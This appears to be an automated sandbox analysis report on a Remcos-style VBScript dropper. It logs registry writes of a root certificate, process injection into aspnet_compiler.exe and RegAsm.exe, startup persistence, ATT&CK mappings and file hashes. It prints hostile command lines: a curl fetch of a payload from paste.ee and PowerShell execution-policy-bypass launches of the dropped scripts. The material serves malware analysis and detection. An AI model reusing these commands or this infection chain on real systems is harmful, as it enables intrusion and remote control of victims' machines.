Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob = 040000000100000010000000ebb04f1d3a2e372f1dda6e27d6b680fa1400000001000000140000003edf290cc1f5cc732ceb3d24e17e52dabd27e2f00b000000010000003400000056006500720069005300690067006e002000540069006d00650020005300740061006d00700069006e006700200043004100000009000000010000000c000000300a06082b0601050507030803000000010000001400000018f7c1fcc3090203fd5baa2f861a754976c8dd250f000000010000001000000065fc47520f66383962ec0b7b88a0821d190000000100000010000000e53d34cecb05c17ee332c749d78c02562000000001000000c0020000308202bc3082022502104a19d2388c82591ca55d735f155ddca3300d06092a864886f70d010104050030819e311f301d060355040a1316566572695369676e205472757374204e6574776f726b31173015060355040b130e566572695369676e2c20496e632e312c302a060355040b1323566572695369676e2054696d65205374616d70696e67205365727669636520526f6f7431343032060355040b132b4e4f204c494142494c4954592041434345505445442c20286329393720566572695369676e2c20496e632e301e170d3937303531323030303030305a170d3034303130373233353935395a30819e311f301d060355040a1316566572695369676e205472757374204e6574776f726b31173015060355040b130e566572695369676e2c20496e632e312c302a060355040b1323566572695369676e2054696d65205374616d70696e67205365727669636520526f6f7431343032060355040b132b4e4f204c494142494c4954592041434345505445442c20286329393720566572695369676e2c20496e632e30819f300d06092a864886f70d010101050003818d0030818902818100d32e20f0687c2c2d2e811cb106b2a70bb7110d57da53d875e3c9332ab2d4f6095b34f3e990fe090cd0db1b5ab9cde7f688b19dc08725eb7d5810736a78cb7115fdc658f629ab585e9604fd2d621158811cca7194d522582fd5cc14058436ba94aab44d4ae9ee3b22ad56997e219c6c86c04a47976ab4a636d5fc092dd3b4399b0203010001300d06092a864886f70d01010405000381810061550e3e7bc792127e11108e22ccd4b3132b5be844e40b789ea47ef3a707721ee259efcc84e389944cdb4e61efb3a4fb463d50340b9f7056f68e2a7f17cee563bf796907732eb095288af5edaaa9d25dcd0aca10098fceb3af2896c479298492dcffba674248a69010e4bf61f89c53e593d1733ff8fd9d4f84ac55d1fd116363	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob = 5c000000010000000400000000040000190000000100000010000000e53d34cecb05c17ee332c749d78c02560f000000010000001000000065fc47520f66383962ec0b7b88a0821d03000000010000001400000018f7c1fcc3090203fd5baa2f861a754976c8dd2509000000010000000c000000300a06082b060105050703080b000000010000003400000056006500720069005300690067006e002000540069006d00650020005300740061006d00700069006e00670020004300410000001400000001000000140000003edf290cc1f5cc732ceb3d24e17e52dabd27e2f0040000000100000010000000ebb04f1d3a2e372f1dda6e27d6b680fa2000000001000000c0020000308202bc3082022502104a19d2388c82591ca55d735f155ddca3300d06092a864886f70d010104050030819e311f301d060355040a1316566572695369676e205472757374204e6574776f726b31173015060355040b130e566572695369676e2c20496e632e312c302a060355040b1323566572695369676e2054696d65205374616d70696e67205365727669636520526f6f7431343032060355040b132b4e4f204c494142494c4954592041434345505445442c20286329393720566572695369676e2c20496e632e301e170d3937303531323030303030305a170d3034303130373233353935395a30819e311f301d060355040a1316566572695369676e205472757374204e6574776f726b31173015060355040b130e566572695369676e2c20496e632e312c302a060355040b1323566572695369676e2054696d65205374616d70696e67205365727669636520526f6f7431343032060355040b132b4e4f204c494142494c4954592041434345505445442c20286329393720566572695369676e2c20496e632e30819f300d06092a864886f70d010101050003818d0030818902818100d32e20f0687c2c2d2e811cb106b2a70bb7110d57da53d875e3c9332ab2d4f6095b34f3e990fe090cd0db1b5ab9cde7f688b19dc08725eb7d5810736a78cb7115fdc658f629ab585e9604fd2d621158811cca7194d522582fd5cc14058436ba94aab44d4ae9ee3b22ad56997e219c6c86c04a47976ab4a636d5fc092dd3b4399b0203010001300d06092a864886f70d01010405000381810061550e3e7bc792127e11108e22ccd4b3132b5be844e40b789ea47ef3a707721ee259efcc84e389944cdb4e61efb3a4fb463d50340b9f7056f68e2a7f17cee563bf796907732eb095288af5edaaa9d25dcd0aca10098fceb3af2896c479298492dcffba674248a69010e4bf61f89c53e593d1733ff8fd9d4f84ac55d1fd116363	WScript.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
760	powershell.exe
760	powershell.exe
2304	aspnet_compiler.exe
2304	aspnet_compiler.exe
1916	powershell.exe
1916	powershell.exe
2304	aspnet_compiler.exe
1040	powershell.exe
1040	powershell.exe
2304	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
2500	powershell.exe
2500	powershell.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
2304	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe
1008	aspnet_compiler.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1008	aspnet_compiler.exe
2304	aspnet_compiler.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	2304	aspnet_compiler.exe
Token: SeDebugPrivilege	760	powershell.exe
Token: SeDebugPrivilege	1916	powershell.exe
Token: SeDebugPrivilege	1040	powershell.exe
Token: SeDebugPrivilege	1008	aspnet_compiler.exe
Token: SeDebugPrivilege	2500	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3516	winhlp32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3620 wrote to memory of 1144	3620	WScript.exe	86
PID 3620 wrote to memory of 1144	3620	WScript.exe	86
PID 3620 wrote to memory of 4060	3620	WScript.exe	92
PID 3620 wrote to memory of 4060	3620	WScript.exe	92
PID 3620 wrote to memory of 4060	3620	WScript.exe	92
PID 4060 wrote to memory of 712	4060	WSCRIPT.EXE	93
PID 4060 wrote to memory of 712	4060	WSCRIPT.EXE	93
PID 4060 wrote to memory of 712	4060	WSCRIPT.EXE	93
PID 4060 wrote to memory of 4028	4060	WSCRIPT.EXE	98
PID 4060 wrote to memory of 4028	4060	WSCRIPT.EXE	98
PID 4060 wrote to memory of 4028	4060	WSCRIPT.EXE	98
PID 4060 wrote to memory of 2304	4060	WSCRIPT.EXE	99
PID 4060 wrote to memory of 2304	4060	WSCRIPT.EXE	99
PID 4060 wrote to memory of 2304	4060	WSCRIPT.EXE	99
PID 4060 wrote to memory of 2304	4060	WSCRIPT.EXE	99
PID 4060 wrote to memory of 2304	4060	WSCRIPT.EXE	99
PID 4060 wrote to memory of 2304	4060	WSCRIPT.EXE	99
PID 4060 wrote to memory of 2304	4060	WSCRIPT.EXE	99
PID 4060 wrote to memory of 2304	4060	WSCRIPT.EXE	99
PID 4060 wrote to memory of 4780	4060	WSCRIPT.EXE	100
PID 4060 wrote to memory of 4780	4060	WSCRIPT.EXE	100
PID 4060 wrote to memory of 4780	4060	WSCRIPT.EXE	100
PID 4060 wrote to memory of 1832	4060	WSCRIPT.EXE	101
PID 4060 wrote to memory of 1832	4060	WSCRIPT.EXE	101
PID 4060 wrote to memory of 1832	4060	WSCRIPT.EXE	101
PID 4060 wrote to memory of 1832	4060	WSCRIPT.EXE	101
PID 4060 wrote to memory of 1832	4060	WSCRIPT.EXE	101
PID 4060 wrote to memory of 1832	4060	WSCRIPT.EXE	101
PID 4060 wrote to memory of 1832	4060	WSCRIPT.EXE	101
PID 4060 wrote to memory of 1832	4060	WSCRIPT.EXE	101
PID 4060 wrote to memory of 3112	4060	WSCRIPT.EXE	102
PID 4060 wrote to memory of 3112	4060	WSCRIPT.EXE	102
PID 4060 wrote to memory of 3112	4060	WSCRIPT.EXE	102
PID 4060 wrote to memory of 2680	4060	WSCRIPT.EXE	104
PID 4060 wrote to memory of 2680	4060	WSCRIPT.EXE	104
PID 4060 wrote to memory of 2680	4060	WSCRIPT.EXE	104
PID 4060 wrote to memory of 2680	4060	WSCRIPT.EXE	104
PID 2304 wrote to memory of 1148	2304	aspnet_compiler.exe	110
PID 2304 wrote to memory of 1148	2304	aspnet_compiler.exe	110
PID 2304 wrote to memory of 1148	2304	aspnet_compiler.exe	110
PID 1148 wrote to memory of 760	1148	cmd.exe	112
PID 1148 wrote to memory of 760	1148	cmd.exe	112
PID 1148 wrote to memory of 760	1148	cmd.exe	112
PID 760 wrote to memory of 4264	760	powershell.exe	113
PID 760 wrote to memory of 4264	760	powershell.exe	113
PID 760 wrote to memory of 4264	760	powershell.exe	113
PID 4264 wrote to memory of 3904	4264	WScript.exe	114
PID 4264 wrote to memory of 3904	4264	WScript.exe	114
PID 4264 wrote to memory of 3904	4264	WScript.exe	114
PID 4264 wrote to memory of 4120	4264	WScript.exe	115
PID 4264 wrote to memory of 4120	4264	WScript.exe	115
PID 4264 wrote to memory of 4120	4264	WScript.exe	115
PID 4264 wrote to memory of 4120	4264	WScript.exe	115
PID 4264 wrote to memory of 4120	4264	WScript.exe	115
PID 4264 wrote to memory of 4120	4264	WScript.exe	115
PID 4264 wrote to memory of 4120	4264	WScript.exe	115
PID 4264 wrote to memory of 4120	4264	WScript.exe	115
PID 4264 wrote to memory of 4120	4264	WScript.exe	115
PID 4264 wrote to memory of 4120	4264	WScript.exe	115
PID 4264 wrote to memory of 4120	4264	WScript.exe	115
PID 4264 wrote to memory of 4120	4264	WScript.exe	115
PID 4264 wrote to memory of 3736	4264	WScript.exe	116
PID 4264 wrote to memory of 3736	4264	WScript.exe	116
PID 4264 wrote to memory of 3736	4264	WScript.exe	116

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IMGES3.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3620
- C:\Windows\System32\curl.exe
  curl -s https://paste.ee/r/BH4k6
  2⤵
  PID:1144
- C:\Windows\SYSWOW64\WSCRIPT.EXE
  "C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\Admin\AppData\Local\Temp\IMGES3.vbs"
  2⤵
  - Checks computer location settings
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4060
- - C:\Windows\SysWOW64\curl.exe
    curl -s https://paste.ee/r/BH4k6
    3⤵
    PID:712
- - C:\Windows\SysWOW64\regsvr32.exe
    "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
    3⤵
    - Loads dropped DLL
    - Registers COM server for autorun
    - Modifies registry class
    PID:4028
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2304
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\Mia Khlifa OnlyFans.vbs"' & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1148
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\Mia Khlifa OnlyFans.vbs"'
        5⤵
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:760
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Mia Khlifa OnlyFans.vbs"
        6⤵
        Checks computer location settings
        Drops startup file
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Modifies system certificate store
        Suspicious use of WriteProcessMemory
        
        PID:4264
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
        7⤵
        Loads dropped DLL
        Registers COM server for autorun
        Modifies registry class
        
        PID:3904
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        
        PID:4120
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
        7⤵
        Loads dropped DLL
        Registers COM server for autorun
        Modifies registry class
        
        PID:3736
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        
        PID:1768
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
        7⤵
        Loads dropped DLL
        Registers COM server for autorun
        Modifies registry class
        
        PID:3924
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        
        PID:3204
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\awkey.vbs"' & exit
      4⤵
      PID:1680
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\awkey.vbs"'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1916
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awkey.vbs"
        6⤵
        Checks computer location settings
        Drops startup file
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:2892
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
        7⤵
        Loads dropped DLL
        Registers COM server for autorun
        Modifies registry class
        
        PID:1832
        
        C:\Windows\winhlp32.exe
        
        "C:\Windows\winhlp32.exe"
        7⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3516
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
        7⤵
        Loads dropped DLL
        Registers COM server for autorun
        Modifies registry class
        
        PID:4372
        
        C:\Windows\winhlp32.exe
        
        "C:\Windows\winhlp32.exe"
        7⤵
        
        PID:4032
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
        7⤵
        Loads dropped DLL
        Registers COM server for autorun
        Modifies registry class
        
        PID:4860
        
        C:\Windows\winhlp32.exe
        
        "C:\Windows\winhlp32.exe"
        7⤵
        
        PID:2008
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 12
        8⤵
        Program crash
        
        PID:5032
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 32
        8⤵
        Program crash
        
        PID:3116
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
        7⤵
        Loads dropped DLL
        Registers COM server for autorun
        Modifies registry class
        
        PID:3508
        
        C:\Windows\winhlp32.exe
        
        "C:\Windows\winhlp32.exe"
        7⤵
        
        PID:4600
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\hvnc.vbs"' & exit
      4⤵
      PID:3924
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\hvnc.vbs"'
        5⤵
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1040
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\hvnc.vbs"
        6⤵
        Checks computer location settings
        Drops startup file
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:1696
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
        7⤵
        Loads dropped DLL
        Registers COM server for autorun
        Modifies registry class
        
        PID:3916
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:1008
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
        7⤵
        Loads dropped DLL
        Registers COM server for autorun
        Modifies registry class
        
        PID:712
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        7⤵
        
        PID:2484
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
        7⤵
        Loads dropped DLL
        Registers COM server for autorun
        Modifies registry class
        
        PID:4640
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        7⤵
        
        PID:1032
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1032 -s 12
        8⤵
        Program crash
        
        PID:444
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1032 -s 32
        8⤵
        Program crash
        
        PID:4260
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
        7⤵
        Loads dropped DLL
        Registers COM server for autorun
        Modifies registry class
        
        PID:4060
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        7⤵
        
        PID:5104
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5104 -s 156
        8⤵
        Program crash
        
        PID:1876
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\aw.vbs"' & exit
      4⤵
      PID:4032
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\aw.vbs"'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2500
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\aw.vbs"
        6⤵
        Checks computer location settings
        Drops startup file
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:2504
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
        7⤵
        Loads dropped DLL
        Registers COM server for autorun
        Modifies registry class
        
        PID:2916
        
        C:\Windows\winhlp32.exe
        
        "C:\Windows\winhlp32.exe"
        7⤵
        
        PID:4812
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
        7⤵
        Loads dropped DLL
        Registers COM server for autorun
        Modifies registry class
        
        PID:4432
        
        C:\Windows\winhlp32.exe
        
        "C:\Windows\winhlp32.exe"
        7⤵
        
        PID:3600
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
        7⤵
        Loads dropped DLL
        Registers COM server for autorun
        Modifies registry class
        
        PID:3376
        
        C:\Windows\winhlp32.exe
        
        "C:\Windows\winhlp32.exe"
        7⤵
        
        PID:4256
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
        7⤵
        Loads dropped DLL
        Registers COM server for autorun
        Modifies registry class
        
        PID:1060
        
        C:\Windows\winhlp32.exe
        
        "C:\Windows\winhlp32.exe"
        7⤵
        
        PID:1180
- - C:\Windows\SysWOW64\regsvr32.exe
    "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
    3⤵
    - Loads dropped DLL
    - Registers COM server for autorun
    - Modifies registry class
    PID:4780
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:1832
- - C:\Windows\SysWOW64\regsvr32.exe
    "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
    3⤵
    - Loads dropped DLL
    - Registers COM server for autorun
    - Modifies registry class
    PID:3112
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:2680
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2680 -s 80
      4⤵
      Program crash
      PID:3184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2680 -ip 2680
1⤵
PID:1772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2008 -ip 2008
1⤵
PID:4876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2008 -ip 2008
1⤵
PID:2884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1032 -ip 1032
1⤵
PID:3108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5104 -ip 5104
1⤵
PID:2444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1032 -ip 1032
1⤵
PID:3064

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
102B

MD5
3edd99ae67d004424a40ae3fbf7d9cfc

SHA1
976aa16477c32ec45528f6afca96a50c0ff1000e

SHA256
192a46d4b412ac67290dff7666099821afdce559c27afd609e94ed6af4c7e102

SHA512
e06b18ce6fb860f7de451e8ee2e73eaf6114493d4c5638971d3576fbfa0a60f620a046080d4fe250a305e94c38b6942eba849415ed597b29f95c5a158bd9d24b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aspnet_compiler.exe.log

Filesize
425B

MD5
4eaca4566b22b01cd3bc115b9b0b2196

SHA1
e743e0792c19f71740416e7b3c061d9f1336bf94

SHA256
34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

SHA512
bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
def65711d78669d7f8e69313be4acf2e

SHA1
6522ebf1de09eeb981e270bd95114bc69a49cda6

SHA256
aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

SHA512
05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
613c94d328fde853e34c30d553ccfe76

SHA1
377611d50cb6c1f9f4a6c9846e8d6b004b6ec9c0

SHA256
f25ba28df0f5a35c822672498b9422fa39810965bd30b5bf608526f4e85fe08e

SHA512
3f0702dd68d2f72bbbdffa1d8d9c054289c71bc0e477a0aabcaa1ddf40b8d3b27d72ffb2b97ed5e2dd0e466474025325498c343e8d381bcc583dcac731a1e53d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
3610dc44040f66337632b84e754e6342

SHA1
7cc7a01e487e239b59c9732e2b2a927687796da0

SHA256
dc208716e901b6cc08cccad8c642352d8376fef885ae456904dbc5994fe8fc0c

SHA512
8bacd0dda0e74163fe05df00d82bf7ed9d3e33024f0e519005f485d090a94fc355060c2f07099404345b6c94226745cf4a27cf2b00c7f53ddb6305a4b6b5f949

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
38a401a3c32c97f102d64c5fcc369373

SHA1
2bd347cd3c9b9459baf9e22b8d2f7582d58e899d

SHA256
5bd8db9e059e1bb7449f7d2ae049e33ec13e75414a4eaf7d26b8e8022a22c62b

SHA512
05cf38499b7eb1738586133b67a7506b80a4d577fddee39640edcefe49e8c0c3486df685d5a249566a0553ef2e899087d7a7559c4a33d068234ce3b0262fd2e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Mia Khlifa OnlyFans.vbs

Filesize
2.1MB

MD5
11ec0a2c7fe2ea0da69a8df1a9965360

SHA1
07f4e5b8a291ed11c32eeb4ce8387de80010b797

SHA256
6fc29354dccf50eea0602f2c3cb1c0526207d5daf5011757664884b8d5c71151

SHA512
e68b6183ab7b0597b18dbff9e9fcc6a995e74317fdbec29def3c75c6879c97e1d33d64ef9a4a6bfb410e177173bf65272a388d3d703d39b184b7843f2530a8dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ze3en2bx.mg2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\aw.vbs

Filesize
1.1MB

MD5
b69a17d464e844d23b1d68edfdb12df6

SHA1
18e6eb778bff88bf2622d33bf5dc3775c49c702c

